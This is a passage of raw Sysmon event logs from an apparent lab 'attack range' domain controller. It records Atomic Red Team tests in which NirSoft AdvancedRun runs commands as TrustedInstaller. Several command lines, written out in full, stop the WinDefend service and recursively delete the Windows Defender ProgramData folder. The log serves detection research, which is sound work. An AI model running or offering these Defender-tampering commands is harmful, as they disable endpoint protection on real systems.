ll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003982912Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.619{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F464-61EA-7B04-000000002702}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 734700x80000000000000003982911Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982910Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003982909Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003982908Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.616{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003982906Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.600{834264DD-DAF8-61EA-5B00-000000002702}41004116C:\Windows\system32\csrss.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003982905Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.584{834264DD-F464-61EA-7B04-000000002702}21802204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.d
ll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003982904Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.591{834264DD-F464-61EA-7C04-000000002702}3088C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe" /EXEFilename C:\Windows\System32\sc.exe /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory /RunAs 8 
/RunC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-F464-61EA-7B04-000000002702}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} ATTACKRANGE\Administrator 154100x80000000000000003982651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.339{834264DD-F464-61EA-7B04-000000002702}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003982264Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:58:48.255{834264DD-F458-61EA-7804-000000002702}4788C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 11241100x80000000000000003982258Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:58:48.129{834264DD-F457-61EA-7704-000000002702}348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exe2022-01-21 17:58:48.129ATTACKRANGE\Administrator 154100x80000000000000003981371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:58:46.591{834264DD-F456-61EA-7604-000000002702}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows 
PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003980226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 534500x80000000000000003980225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003980224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980220Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
